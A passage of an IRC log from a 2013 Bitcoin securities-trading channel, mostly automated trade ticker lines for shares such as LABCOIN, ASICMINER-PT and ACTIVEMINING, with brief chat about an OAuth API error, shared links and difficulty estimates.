icedrill get sold on bitfunder now that the price has moved from 0.0014 to 0.0015 BTC per share? Aug 12 05:22:09 hi mjr_1 Aug 12 05:22:27 [BTCTC] [ACTIVEMINING] 22 @ 0.005499 = 0.121 BTC [-] Aug 12 05:23:49 [BTCTC] [ASICMINER-PT] 1 @ 3.849 BTC [+] Aug 12 05:23:51 [BTCTC] [ASICMINER-PT] 3 @ 3.85 = 11.55 BTC [+] Aug 12 05:23:52 [BTCTC] [ASICMINER-PT] 4 @ 3.86 = 15.44 BTC [+] Aug 12 05:23:53 [BTCTC] [ASICMINER-PT] 3 @ 3.861 = 11.583 BTC [+] Aug 12 05:23:54 [BTCTC] [ASICMINER-PT] 5 @ 3.864 = 19.32 BTC [+] Aug 12 05:23:55 [BTCTC] [ASICMINER-PT] 4 @ 3.87 = 15.48 BTC [+] Aug 12 05:23:56 [BTCTC] [ASICMINER-PT] 2 @ 3.872 = 7.744 BTC [+] Aug 12 05:25:05 sup mjr Aug 12 05:25:26 u been going to them bit angels meeting in union square? Aug 12 05:25:58 [BTCTC] [ASICMINER-PT] 1 @ 3.871 BTC [-] Aug 12 05:25:59 [BTCTC] [ASICMINER-PT] 2 @ 3.872 = 7.744 BTC [+] Aug 12 05:26:02 Anyone got 1min to give me a hand with the BTCT oauth api? Aug 12 05:28:18 Yea Aug 12 05:28:19 I might Aug 12 05:28:23 whats your prob Aug 12 05:28:51 thanks, appreciate it.. Aug 12 05:29:11 No wories Aug 12 05:29:41 Ive never touched oauth before so Its probably something stupid im doing.. I get this error when trying to connect from python with rauth library Aug 12 05:29:52 oauth_problem=parameter_absent&oauth_parameters_absent=oauth_callback%26scope Aug 12 05:30:15 sounds like it missing an argument or something Aug 12 05:30:18 Pmed you Aug 12 05:30:27 cool Aug 12 05:32:51 bobbabad: I recommend you dont use that Aug 12 05:33:03 Why is that? Aug 12 05:33:07 I recommend you use something like https://github.com/oauth-io/oauthd Aug 12 05:33:18 a stand alone correctly written oauth daemon Aug 12 05:34:08 ok.. will check it out Aug 12 05:38:20 [BTCTC] [ASICMINER-PT] 1 @ 3.873 BTC [+] Aug 12 05:38:22 [BTCTC] [ASICMINER-PT] 1 @ 3.874 BTC [+] Aug 12 05:38:23 [BTCTC] [ASICMINER-PT] 1 @ 3.88 BTC [+] Aug 12 05:38:24 [BTCTC] [ASICMINER-PT] 5 @ 3.89 = 19.45 BTC [+] Aug 12 05:38:26 [BTCTC] [ASICMINER-PT] 5 @ 3.899 = 19.495 BTC [+] Aug 12 05:39:20 [BTCTC] [LABCOIN] 30 @ 0.001314 = 0.0394 BTC [-] Aug 12 05:39:21 [BTCTC] [LABCOIN] 100 @ 0.001313 = 0.1313 BTC [-] Aug 12 05:39:23 [BTCTC] [LABCOIN] 1000 @ 0.0013 = 1.3 BTC [-] Aug 12 05:39:24 [BTCTC] [LABCOIN] 2000 @ 0.001298 = 2.596 BTC [-] Aug 12 05:39:25 [BTCTC] [LABCOIN] 48 @ 0.001291 = 0.062 BTC [-] Aug 12 05:39:26 [BTCTC] [LABCOIN] 389 @ 0.00129 = 0.5018 BTC [-] Aug 12 05:39:26 bobbabad: Ive looked at tons of oauth auth impls, they basically all fucking suck and have not been written against real world oauth identity providers Aug 12 05:39:27 [BTCTC] [LABCOIN] 250 @ 0.001286 = 0.3215 BTC [-] Aug 12 05:39:27 [BTCTC] [LABCOIN] 1000 @ 0.001284 = 1.284 BTC [-] Aug 12 05:39:28 [BTCTC] [LABCOIN] 76 @ 0.001281 = 0.0974 BTC [-] Aug 12 05:39:29 [BTCTC] [LABCOIN] 611 @ 0.00128 = 0.7821 BTC [-] Aug 12 05:39:30 [BTCTC] [LABCOIN] 497 @ 0.001272 = 0.6322 BTC [-] Aug 12 05:39:31 [BTCTC] [LABCOIN] 1980 @ 0.00127 = 2.5146 BTC [-] Aug 12 05:39:32 [BTCTC] [LABCOIN] 5 @ 0.001264 = 0.0063 BTC [-] Aug 12 05:39:33 [BTCTC] [LABCOIN] 40 @ 0.001263 = 0.0505 BTC [-] Aug 12 05:39:34 bobbabad: instead they're written against the spec, and the spec sucks Aug 12 05:39:35 [BTCTC] [LABCOIN] 25 @ 0.001262 = 0.0316 BTC [-] Aug 12 05:39:36 [BTCTC] [LABCOIN] 200 @ 0.001261 = 0.2522 BTC [-] Aug 12 05:39:37 [BTCTC] [LABCOIN] 239 @ 0.00126 = 0.3011 BTC [-] Aug 12 05:39:38 [BTCTC] [LABCOIN] 27 @ 0.001259 = 0.034 BTC [-] Aug 12 05:39:38 [BTCTC] [LABCOIN] 1890 @ 0.001258 = 2.3776 BTC [-] Aug 12 05:39:39 [BTCTC] [LABCOIN] 274 @ 0.001253 = 0.3433 BTC [-] Aug 12 05:39:40 [BTCTC] [LABCOIN] 55 @ 0.001251 = 0.0688 BTC [-] Aug 12 05:39:41 [BTCTC] [LABCOIN] 2193 @ 0.001251 = 2.7434 BTC [-] Aug 12 05:39:42 [BTCTC] [LABCOIN] 200 @ 0.00125 = 0.25 BTC [-] Aug 12 05:39:43 [BTCTC] [LABCOIN] 165 @ 0.00125 = 0.2063 BTC [-] Aug 12 05:39:44 [BTCTC] [LABCOIN] 80 @ 0.00125 = 0.1 BTC [-] Aug 12 05:39:45 [BTCTC] [LABCOIN] 150 @ 0.001244 = 0.1866 BTC [-] Aug 12 05:39:46 [BTCTC] [LABCOIN] 1200 @ 0.001243 = 1.4916 BTC [-] Aug 12 05:39:47 [BTCTC] [LABCOIN] 25 @ 0.001241 = 0.031 BTC [-] Aug 12 05:39:48 [BTCTC] [LABCOIN] 200 @ 0.00124 = 0.248 BTC [-] Aug 12 05:39:49 [BTCTC] [LABCOIN] 106 @ 0.001233 = 0.1307 BTC [-] Aug 12 05:39:50 [BTCTC] [LABCOIN] 854 @ 0.001232 = 1.0521 BTC [-] Aug 12 05:39:51 [BTCTC] [LABCOIN] 504 @ 0.001231 = 0.6204 BTC [-] Aug 12 05:39:52 [BTCTC] [LABCOIN] 100 @ 0.00123 = 0.123 BTC [-] Aug 12 05:39:53 [BTCTC] [LABCOIN] 30 @ 0.00123 = 0.0369 BTC [-] Aug 12 05:39:54 [BTCTC] [LABCOIN] 2500 @ 0.001227 = 3.0675 BTC [-] Aug 12 05:39:55 [BTCTC] [LABCOIN] 30 @ 0.001227 = 0.0368 BTC [-] Aug 12 05:39:57 [BTCTC] [LABCOIN] 30 @ 0.001227 = 0.0368 BTC [-] Aug 12 05:40:39 [BTCTC] [LABCOIN] 1 @ 0.001228 BTC [+] Aug 12 05:40:40 [BTCTC] [LABCOIN] 30 @ 0.001227 = 0.0368 BTC [-] Aug 12 05:40:41 [BTCTC] [LABCOIN] 2500 @ 0.001226 = 3.065 BTC [-] Aug 12 05:40:42 [BTCTC] [LABCOIN] 1000 @ 0.001222 = 1.222 BTC [-] Aug 12 05:40:43 [BTCTC] [LABCOIN] 1800 @ 0.001221 = 2.1978 BTC [-] Aug 12 05:41:42 Diablo: gotcha, I ended up on this one because it seemed to be the most popular one for python.. Also it would be ideal for me need if its just a library to install rather then a daemon to run Aug 12 05:41:53 *my needs Aug 12 05:42:26 but if I cant figure this out I will go on your suggestion Aug 12 05:42:31 [BTCTC] [ACTIVEMINING] 9 @ 0.005493 = 0.0494 BTC [-] Aug 12 05:42:32 [BTCTC] [ACTIVEMINING] 49 @ 0.005494 = 0.2692 BTC [+] Aug 12 05:42:33 [BTCTC] [ACTIVEMINING] 112 @ 0.005499 = 0.6159 BTC [+] Aug 12 05:42:34 [BTCTC] [ACTIVEMINING] 632 @ 0.0055 = 3.476 BTC [+] Aug 12 05:42:36 [BTCTC] [ACTIVEMINING] 22 @ 0.005506 = 0.1211 BTC [+] Aug 12 05:42:37 [BTCTC] [ACTIVEMINING] 3 @ 0.005507 = 0.0165 BTC [+] Aug 12 05:42:38 [BTCTC] [ACTIVEMINING] 7 @ 0.005509 = 0.0386 BTC [+] Aug 12 05:42:39 [BTCTC] [ACTIVEMINING] 100 @ 0.00551 = 0.551 BTC [+] Aug 12 05:42:39 [BTCTC] [ACTIVEMINING] 18 @ 0.005511 = 0.0992 BTC [+] Aug 12 05:42:40 [BTCTC] [ACTIVEMINING] 23 @ 0.005511 = 0.1268 BTC [+] Aug 12 05:42:41 [BTCTC] [ACTIVEMINING] 47 @ 0.005512 = 0.2591 BTC [+] Aug 12 05:42:42 [BTCTC] [ACTIVEMINING] 22 @ 0.005513 = 0.1213 BTC [+] Aug 12 05:42:43 [BTCTC] [ACTIVEMINING] 44 @ 0.005515 = 0.2427 BTC [+] Aug 12 05:42:44 [BTCTC] [ACTIVEMINING] 24 @ 0.005516 = 0.1324 BTC [+] Aug 12 05:42:45 [BTCTC] [ACTIVEMINING] 19 @ 0.005516 = 0.1048 BTC [+] Aug 12 05:42:46 [BTCTC] [ACTIVEMINING] 34 @ 0.005517 = 0.1876 BTC [+] Aug 12 05:42:47 [BTCTC] [ACTIVEMINING] 13 @ 0.005518 = 0.0717 BTC [+] Aug 12 05:42:47 [BTCTC] [ACTIVEMINING] 51 @ 0.00552 = 0.2815 BTC [+] Aug 12 05:42:48 [BTCTC] [ACTIVEMINING] 21 @ 0.005521 = 0.1159 BTC [+] Aug 12 05:42:49 [BTCTC] [ACTIVEMINING] 30 @ 0.005521 = 0.1656 BTC [+] Aug 12 05:42:50 [BTCTC] [ACTIVEMINING] 33 @ 0.005522 = 0.1822 BTC [+] Aug 12 05:42:51 [BTCTC] [ACTIVEMINING] 40 @ 0.005523 = 0.2209 BTC [+] Aug 12 05:42:53 [BTCTC] [ACTIVEMINING] 26 @ 0.005524 = 0.1436 BTC [+] Aug 12 05:42:54 [BTCTC] [ACTIVEMINING] 42 @ 0.005525 = 0.2321 BTC [+] Aug 12 05:42:55 [BTCTC] [ACTIVEMINING] 29 @ 0.005526 = 0.1603 BTC [+] Aug 12 05:42:56 [BTCTC] [ACTIVEMINING] 38 @ 0.005526 = 0.21 BTC [+] Aug 12 05:42:57 [BTCTC] [ACTIVEMINING] 27 @ 0.005526 = 0.1492 BTC [+] Aug 12 05:42:58 [BTCTC] [ACTIVEMINING] 41 @ 0.005527 = 0.2266 BTC [+] Aug 12 05:42:58 [BTCTC] [ACTIVEMINING] 36 @ 0.005528 = 0.199 BTC [+] Aug 12 05:42:59 [BTCTC] [ACTIVEMINING] 22 @ 0.005529 = 0.1216 BTC [+] Aug 12 05:43:00 [BTCTC] [ACTIVEMINING] 30 @ 0.00553 = 0.1659 BTC [+] Aug 12 05:43:01 [BTCTC] [ACTIVEMINING] 29 @ 0.005531 = 0.1604 BTC [+] Aug 12 05:43:02 [BTCTC] [ACTIVEMINING] 20 @ 0.005531 = 0.1106 BTC [+] Aug 12 05:43:03 [BTCTC] [ACTIVEMINING] 32 @ 0.005532 = 0.177 BTC [+] Aug 12 05:43:04 [BTCTC] [ACTIVEMINING] 44 @ 0.005534 = 0.2435 BTC [+] Aug 12 05:43:05 [BTCTC] [ACTIVEMINING] 24 @ 0.005535 = 0.1328 BTC [+] Aug 12 05:43:06 [BTCTC] [ACTIVEMINING] 25 @ 0.005536 = 0.1384 BTC [+] Aug 12 05:43:07 [BTCTC] [ACTIVEMINING] 28 @ 0.005536 = 0.155 BTC [+] Aug 12 05:43:07 [BTCTC] [ACTIVEMINING] 25 @ 0.005537 = 0.1384 BTC [+] Aug 12 05:43:08 [BTCTC] [ACTIVEMINING] 100 @ 0.00554 = 0.554 BTC [+] Aug 12 05:43:09 [BTCTC] [ACTIVEMINING] 100 @ 0.005541 = 0.5541 BTC [+] Aug 12 05:43:10 [BTCTC] [ACTIVEMINING] 83 @ 0.005541 = 0.4599 BTC [+] Aug 12 05:43:11 [BTCTC] [ACTIVEMINING] 100 @ 0.005542 = 0.5542 BTC [+] Aug 12 05:43:12 [BTCTC] [ACTIVEMINING] 100 @ 0.005543 = 0.5543 BTC [+] Aug 12 05:43:13 [BTCTC] [ACTIVEMINING] 100 @ 0.005544 = 0.5544 BTC [+] Aug 12 05:43:14 [BTCTC] [ACTIVEMINING] 100 @ 0.005545 = 0.5545 BTC [+] Aug 12 05:43:15 [BTCTC] [ACTIVEMINING] 100 @ 0.005546 = 0.5546 BTC [+] Aug 12 05:43:16 [BTCTC] [ACTIVEMINING] 83 @ 0.005546 = 0.4603 BTC [+] Aug 12 05:43:17 [BTCTC] [ACTIVEMINING] 100 @ 0.005547 = 0.5547 BTC [+] Aug 12 05:43:18 [BTCTC] [ACTIVEMINING] 100 @ 0.005548 = 0.5548 BTC [+] Aug 12 05:43:19 [BTCTC] [ACTIVEMINING] 100 @ 0.005549 = 0.5549 BTC [+] Aug 12 05:43:20 [BTCTC] [ACTIVEMINING] 19 @ 0.00555 = 0.1055 BTC [+] Aug 12 05:43:21 [BTCTC] [ACTIVEMINING] 100 @ 0.00555 = 0.555 BTC [+] Aug 12 05:43:22 [BTCTC] [ACTIVEMINING] 22 @ 0.005594 = 0.1231 BTC [+] Aug 12 05:43:23 [BTCTC] [ACTIVEMINING] 113 @ 0.005595 = 0.6322 BTC [+] Aug 12 05:43:24 [BTCTC] [ACTIVEMINING] 75 @ 0.005599 = 0.4199 BTC [+] Aug 12 05:43:25 [BTCTC] [ACTIVEMINING] 377 @ 0.0056 = 2.1112 BTC [+] Aug 12 05:43:26 [BTCTC] [ACTIVEMINING] 926 @ 0.005694 = 5.2726 BTC [+] Aug 12 05:43:27 [BTCTC] [ACTIVEMINING] 631 @ 0.005695 = 3.5935 BTC [+] Aug 12 05:43:28 [BTCTC] [LABCOIN] 30 @ 0.001222 = 0.0367 BTC [+] Aug 12 05:43:29 [BTCTC] [LABCOIN] 292 @ 0.001221 = 0.3565 BTC [-] Aug 12 05:43:30 [BTCTC] [LABCOIN] 250 @ 0.00122 = 0.305 BTC [-] Aug 12 05:43:31 [BTCTC] [LABCOIN] 978 @ 0.001219 = 1.1922 BTC [-] Aug 12 05:44:48 [BTCTC] [ACTIVEMINING] 30 @ 0.005389 = 0.1617 BTC [-] Aug 12 05:44:49 [BTCTC] [ACTIVEMINING] 68 @ 0.005388 = 0.3664 BTC [-] Aug 12 05:44:51 [BTCTC] [ACTIVEMINING] 29 @ 0.005387 = 0.1562 BTC [-] Aug 12 05:44:52 [BTCTC] [ACTIVEMINING] 50 @ 0.005384 = 0.2692 BTC [-] Aug 12 05:44:53 [BTCTC] [ACTIVEMINING] 342 @ 0.005316 = 1.8181 BTC [-] Aug 12 05:44:54 [BTCTC] [ACTIVEMINING] 1481 @ 0.005315 = 7.8715 BTC [-] Aug 12 05:44:57 [BTCTC] [ACTIVEMINING] 30 @ 0.005693 = 0.1708 BTC [+] Aug 12 05:44:59 [BTCTC] [ACTIVEMINING] 110 @ 0.005694 = 0.6263 BTC [+] Aug 12 05:47:55 MiningBuddy: heh, im reading that log you found lol Aug 12 05:48:14 er Aug 12 05:48:17 mircea_popescu: ^ Aug 12 05:48:29 which ? Aug 12 05:48:58 [BTCTC] [BTCGARDEN] 5 @ 0.01595 = 0.0798 BTC [-] Aug 12 05:49:26 http://pastebin.com/PthgrzDS Aug 12 05:49:31 [mIRC] #bitcoin@freenode 2012-07-17 partial log - Pastebin.com Aug 12 05:49:43 the pirate thing Aug 12 05:50:03 o look the pirate thing Aug 12 05:50:21 a the girl dug it up did she. win. Aug 12 05:56:25 [HAVELOCK] [XBOND] 400 @ 0.001047 = 0.4188 BTC [+] Aug 12 05:59:54 [BTCTC] [LABCOIN] 30 @ 0.001226 = 0.0368 BTC [+] Aug 12 05:59:54 [BTCTC] [LABCOIN] 20 @ 0.001225 = 0.0245 BTC [-] Aug 12 05:59:56 [BTCTC] [LABCOIN] 1150 @ 0.001221 = 1.4042 BTC [-] Aug 12 06:00:27 [BTCTC] [LABCOIN] 30 @ 0.001222 = 0.0367 BTC [+] Aug 12 06:00:29 [BTCTC] [LABCOIN] 270 @ 0.001221 = 0.3297 BTC [-] Aug 12 06:04:06 [BTCTC] [BTCGARDEN] 8 @ 0.01595 = 0.1276 BTC [-] Aug 12 06:04:59 [BTCTC] [ASICMINER-PT] 1 @ 3.898 BTC [-] Aug 12 06:12:22 [BTCTC] [BTCGARDEN] 2 @ 0.01595 = 0.0319 BTC [-] Aug 12 06:12:23 [BTCTC] [BTCGARDEN] 8 @ 0.01596 = 0.1277 BTC [+] Aug 12 06:17:48 [HAVELOCK] [HIM] 3 @ 0.131 = 0.393 BTC [+] Aug 12 06:17:51 [HAVELOCK] [HIM] 1 @ 0.13100001 BTC [+] Aug 12 06:17:53 [HAVELOCK] [HIM] 1 @ 0.133 BTC [+] Aug 12 06:17:55 [HAVELOCK] [HIM] 5 @ 0.13399999 = 0.67 BTC [+] Aug 12 06:17:57 [HAVELOCK] [HIM] 16 @ 0.13499998 = 2.16 BTC [+] Aug 12 06:17:58 [HAVELOCK] [HIM] 10 @ 0.13899 = 1.3899 BTC [+] Aug 12 06:18:01 [HAVELOCK] [HIM] 4 @ 0.13999942 = 0.56 BTC [+] Aug 12 06:18:48 [MPEX] [S.MPOE] 5000 @ 0.00084912 = 4.2456 BTC [+] Aug 12 06:18:50 [MPEX] [S.MPOE] 12800 @ 0.00084929 = 10.8709 BTC [+] Aug 12 06:19:45 [BTCTC] [LABCOIN] 30 @ 0.00126 = 0.0378 BTC [+] Aug 12 06:19:47 [BTCTC] [LABCOIN] 235 @ 0.001261 = 0.2963 BTC [+] Aug 12 06:19:48 [BTCTC] [LABCOIN] 277 @ 0.001263 = 0.3499 BTC [+] Aug 12 06:19:49 [BTCTC] [LABCOIN] 29 @ 0.001266 = 0.0367 BTC [+] **** BEGIN LOGGING AT Mon Aug 12 12:21:59 2013 Aug 12 12:22:24 ;;later tell thestringpuller exactly. that's why she posted it. Aug 12 12:22:25 The operation succeeded. Aug 12 12:25:41 [BTCTC] [LABCOIN] 30 @ 0.001494 = 0.0448 BTC [+] Aug 12 12:25:42 [BTCTC] [LABCOIN] 20 @ 0.001495 = 0.0299 BTC [+] Aug 12 12:25:43 [BTCTC] [LABCOIN] 158 @ 0.001499 = 0.2368 BTC [+] Aug 12 12:29:17 [BTCTC] [LABCOIN] 20 @ 0.001499 = 0.03 BTC [+] Aug 12 12:29:18 [BTCTC] [LABCOIN] 6948 @ 0.001503 = 10.4428 BTC [+] Aug 12 12:30:01 [BTCTC] [ASICMINER-PT] 2 @ 4.194 = 8.388 BTC [+] Aug 12 12:30:01 [BTCTC] [ASICMINER-PT] 3 @ 4.195 = 12.585 BTC [+] Aug 12 12:30:02 [BTCTC] [ASICMINER-PT] 1 @ 4.196 BTC [+] Aug 12 12:30:04 [BTCTC] [ASICMINER-PT] 4 @ 4.196 = 16.784 BTC [+] Aug 12 12:31:52 [BTCTC] [LABCOIN] 951 @ 0.001503 = 1.4294 BTC [+] Aug 12 12:32:25 [BTCTC] [LABCOIN] 380 @ 0.001504 = 0.5715 BTC [+] Aug 12 12:32:27 [BTCTC] [LABCOIN] 1620 @ 0.001504 = 2.4365 BTC [+] Aug 12 12:33:37 [BTCTC] [LABCOIN] 2049 @ 0.001503 = 3.0796 BTC [-] Aug 12 12:37:05 [BTCTC] [ACTIVEMINING] 17 @ 0.005875 = 0.0999 BTC [+] Aug 12 12:37:07 [BTCTC] [ACTIVEMINING] 89 @ 0.005876 = 0.523 BTC [+] Aug 12 12:37:08 [BTCTC] [ACTIVEMINING] 8 @ 0.005899 = 0.0472 BTC [+] Aug 12 12:37:09 [BTCTC] [ACTIVEMINING] 10 @ 0.0059 = 0.059 BTC [+] Aug 12 12:37:10 [BTCTC] [ACTIVEMINING] 33 @ 0.0059 = 0.1947 BTC [+] Aug 12 12:37:10 [BTCTC] [ACTIVEMINING] 10 @ 0.005929 = 0.0593 BTC [+] Aug 12 12:37:11 [BTCTC] [ACTIVEMINING] 50 @ 0.00593 = 0.2965 BTC [+] Aug 12 12:37:13 [BTCTC] [ACTIVEMINING] 108 @ 0.005934 = 0.6409 BTC [+] Aug 12 12:37:14 [BTCTC] [ACTIVEMINING] 75 @ 0.005935 = 0.4451 BTC [+] Aug 12 12:39:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0409 BTC [-] Aug 12 12:39:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.0409 = 0.2863 BTC [-] Aug 12 12:39:59 [BTCTC] [DMS.SELLING] 200 @ 0.0245 = 4.9 BTC [-] Aug 12 12:40:45 http://trilema.com/2013/the-one-person-id-like-to-meet/ << pretty great one, this. Aug 12 12:40:48 The one person I’d like to meet. pe Trilema - Un blog de Mircea Popescu. Aug 12 12:40:56 [BTCTC] [LABCOIN] 30 @ 0.001475 = 0.0443 BTC [-] Aug 12 12:40:57 [BTCTC] [LABCOIN] 20 @ 0.001474 = 0.0295 BTC [-] Aug 12 12:40:59 [BTCTC] [LABCOIN] 2 @ 0.00147 = 0.0029 BTC [-] Aug 12 12:41:00 [BTCTC] [LABCOIN] 153 @ 0.001456 = 0.2228 BTC [-] Aug 12 12:43:41 [BTCTC] [ASICMINER-PT] 1 @ 4.196 BTC [+] Aug 12 12:43:42 [BTCTC] [ASICMINER-PT] 4 @ 4.197 = 16.788 BTC [+] Aug 12 12:43:54 [BTCTC] [DMS.MINING] 1 @ 0.003855 BTC [+] Aug 12 12:44:20 [BTCTC] [ASICMINER-PT] 25 @ 4.198 = 104.95 BTC [+] Aug 12 12:44:21 [BTCTC] [ASICMINER-PT] 5 @ 4.198 = 20.99 BTC [+] Aug 12 12:44:30 [BTCTC] [ASICMINER-PT] 1 @ 4.197 BTC [-] Aug 12 12:48:25 [BTCTC] [ASICMINER-PT] 2 @ 4.197 = 8.394 BTC [-] Aug 12 12:48:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.04125 BTC [+] Aug 12 12:51:27 [MPEX] [S.MPOE] 4913 @ 0.00084834 = 4.1679 BTC [-] Aug 12 12:59:01 [BTCTC] [LABCOIN] 30 @ 0.001472 = 0.0442 BTC [+] Aug 12 12:59:02 [BTCTC] [LABCOIN] 1304 @ 0.001471 = 1.9182 BTC [-] Aug 12 12:59:03 [BTCTC] [LABCOIN] 2046 @ 0.00147 = 3.0076 BTC [-] Aug 12 13:03:32 [BTCTC] [LABCOIN] 1 @ 0.001488 BTC [+] Aug 12 13:09:23 [BTCTC] [BITVPS] 1 @ 0.002163 BTC [-] Aug 12 13:14:13 [BTCTC] [TAT.ASICMINER] 39 @ 0.04125 = 1.6088 BTC [+] Aug 12 13:17:35 [BTCTC] [DMS.SELLING] 240 @ 0.0249 = 5.976 BTC [+] Aug 12 13:17:37 [BTCTC] [DMS.SELLING] 100 @ 0.0249 = 2.49 BTC [+] Aug 12 13:24:11 [BTCTC] [BASIC-MINING] 1 @ 0.327 BTC [+] Aug 12 13:24:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.04125 = 1.0313 BTC [+] Aug 12 13:27:34 [BTCTC] [LABCOIN] 2 @ 0.001488 = 0.003 BTC [+] Aug 12 13:27:36 [BTCTC] [LABCOIN] 5 @ 0.001489 = 0.0074 BTC [+] Aug 12 13:27:37 [BTCTC] [LABCOIN] 5 @ 0.001489 = 0.0074 BTC [+] Aug 12 13:27:38 [BTCTC] [LABCOIN] 10 @ 0.001489 = 0.0149 BTC [+] Aug 12 13:27:39 [BTCTC] [LABCOIN] 25 @ 0.001493 = 0.0373 BTC [+] Aug 12 13:27:53 w47 Aug 12 13:33:05 [BTCTC] [LABCOIN] 10 @ 0.001493 = 0.0149 BTC [+] Aug 12 13:33:17 [BTCTC] [LABCOIN] 15 @ 0.001485 = 0.0223 BTC [-] Aug 12 13:34:44 [BTCTC] [LABCOIN] 380 @ 0.001485 = 0.5643 BTC [-] Aug 12 13:35:33 [BTCTC] [ASICMINER-PT] 1 @ 4.196 BTC [-] Aug 12 13:38:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0414 = 0.1242 BTC [+] Aug 12 13:39:15 [BTCTC] [TAT.ASICMINER] 9 @ 0.04151 = 0.3736 BTC [+] Aug 12 13:40:32 [BTCTC] [ACTIVEMINING] 70 @ 0.005917 = 0.4142 BTC [-] Aug 12 13:41:01 [BTCTC] [ASICMINER-PT] 1 @ 4.197 BTC [+] Aug 12 13:42:10 [BTCTC] [TAT.ASICMINER] 91 @ 0.04151 = 3.7774 BTC [+] Aug 12 13:42:19 [BTCTC] [TAT.MINIGAME] 1 @ 0.000231 BTC [-] Aug 12 13:43:27 [BTCTC] [DMS.SELLING] 100 @ 0.02645 = 2.645 BTC [+] Aug 12 13:43:28 [BTCTC] [DMS.SELLING] 16 @ 0.02645 = 0.4232 BTC [+] Aug 12 13:43:50 [BTCTC] [LABCOIN] 25 @ 0.001493 = 0.0373 BTC [+] Aug 12 13:43:52 [BTCTC] [LABCOIN] 205 @ 0.001494 = 0.3063 BTC [+] Aug 12 13:43:53 [BTCTC] [LABCOIN] 36 @ 0.001499 = 0.054 BTC [+] Aug 12 13:43:53 [BTCTC] [LABCOIN] 80 @ 0.0015 = 0.12 BTC [+] Aug 12 13:43:54 [BTCTC] [LABCOIN] 210 @ 0.001501 = 0.3152 BTC [+] Aug 12 13:43:55 [BTCTC] [LABCOIN] 54 @ 0.001502 = 0.0811 BTC [+] Aug 12 13:43:56 [BTCTC] [LABCOIN] 12990 @ 0.001503 = 19.524 BTC [+] Aug 12 13:44:19 [BTCTC] [DMS.SELLING] 22 @ 0.02646 = 0.5821 BTC [+] Aug 12 13:45:18 [BTCTC] [DMS.PURCHASE] 25 @ 0.02806 = 0.7015 BTC [-] Aug 12 13:46:06 [BTCTC] [ASICMINER-PT] 2 @ 4.197 = 8.394 BTC [+] Aug 12 13:46:08 [BTCTC] [ASICMINER-PT] 1 @ 4.197 BTC [+] Aug 12 13:46:30 [BTCTC] [LABCOIN] 10 @ 0.001503 = 0.015 BTC [+] Aug 12 13:46:39 [BTCTC] [ASICMINER-PT] 6 @ 4.198 = 25.188 BTC [+] Aug 12 13:47:33 [BTCTC] [DMS.PURCHASE] 100 @ 0.02806 = 2.806 BTC [-] Aug 12 13:50:49 is havelock down? Aug 12 13:50:56 yes :/ Aug 12 13:52:01 ;;bc,stats Aug 12 13:52:07 Current Blocks: 251691 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 308 blocks | Next Difficulty In About: None | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 12 13:52:09 is that down too? Aug 12 13:52:25 ;;estimate Aug 12 13:52:26 Next difficulty estimate | None based on data since last change | 56845187.9579 based on data for last three days Aug 12 13:52:46 .d Aug 12 13:52:46 37392766.13647 | Next Diff in 263 blocks | Estimated Change: 35.2180% in 1d 4h 25m 0s Aug 12 13:53:14 [BTCTC] [LABCOIN] 547 @ 0.0015 = 0.8205 BTC [-] Aug 12 13:53:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.04175 = 0.1253 BTC [+] Aug 12 13:53:20 [BTCTC] [ASICMINER-PT] 8 @ 4.198 = 33.584 BTC [+] Aug 12 13:53:34 it has been broken for a while Aug 12 13:53:43 http://www.salon.com/2013/08/10/the_nsa_dea_police_state_tango/ Aug 12 13:53:46 The NSA-DEA police state tango - Salon.com Aug 12 13:54:03 [BTCTC] [LABCOIN] 137 @ 0.001501 = 0.2056 BTC [+] Aug 12 13:54:05 [BTCTC] [LABCOIN] 363 @ 0.001503 = 0.5456 BTC [+] Aug 12 13:54:11 anyone seen that? basically, DEA uses mass surveillance to target drug suspects Aug 12 13:54:33 and then in turn supplies fake evidence to court to hise the source Aug 12 13:54:38 *hide Aug 12 13:54:46 so surprising. Aug 12 13:54:50 but nice find. Aug 12 13:54:53 i'm not sure even communists did this Aug 12 13:55:19 [BTCTC] [LABCOIN] 1 @ 0.001485 BTC [-] Aug 12 13:55:24 yeah, they did. Aug 12 13:55:31 [BTCTC] [LABCOIN] 1 @ 0.001485 BTC [-] Aug 12 13:55:55 i suspect the next step in the progression is politically-motivated mental health hospitals. Aug 12 13:57:19 [BTCTC] [LABCOIN] 10 @ 0.0015 = 0.015 BTC [+] Aug 12 13:57:54 well, first they have to find out how to make mental hospitals profitable Aug 12 13:58:45 that's easy : obamacare. Aug 12 13:59:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.04125 = 0.0825 BTC [-] Aug 12 14:00:30 [BTCTC] [LABCOIN] 100 @ 0.0015 = 0.15 BTC [+] Aug 12 14:00:40 [BTCTC] [TAT.ASICMINER] 38 @ 0.0409 = 1.5542 BTC [-] Aug 12 14:01:21 [BTCTC] [TAT.MINIGAME] 20 @ 0.00022 = 0.0044 BTC [-] Aug 12 14:05:42 [BTCTC] [LABCOIN] 100 @ 0.0015 = 0.15 BTC [+] Aug 12 14:06:49 [BTCTC] [LABCOIN] 90 @ 0.0015 = 0.135 BTC [+] Aug 12 14:06:51 [BTCTC] [LABCOIN] 35 @ 0.0015 = 0.0525 BTC [+] Aug 12 14:11:09 [BTCTC] [LABCOIN] 37 @ 0.0015 = 0.0555 BTC [+] Aug 12 14:14:49 .d Aug 12 14:14:50 37392766.13647 | Next Diff in 258 blocks | Estimated Change: 35.3915% in 1d 3h 46m 23s Aug 12 14:16:47 [BTCTC] [BASIC-MINING] 1 @ 0.3101 BTC [-] Aug 12 14:16:49 [BTCTC] [BASIC-MINING] 4 @ 0.31 = 1.24 BTC [-] Aug 12 14:21:29 [BTCTC] [LABCOIN] 136 @ 0.001499 = 0.2039 BTC [-] Aug 12 14:21:43 [BTCTC] [BASIC-MINING] 1 @ 0.31 BTC [-] Aug 12 14:22:00 [BTCTC] [LABCOIN] 928 @ 0.0015 = 1.392 BTC [+] Aug 12 14:22:40 [BTCTC] [LABCOIN] 1299 @ 0.001503 = 1.9524 BTC [+] Aug 12 14:23:26 [BTCTC] [LABCOIN] 30 @ 0.001502 = 0.0451 BTC [-] Aug 12 14:23:53 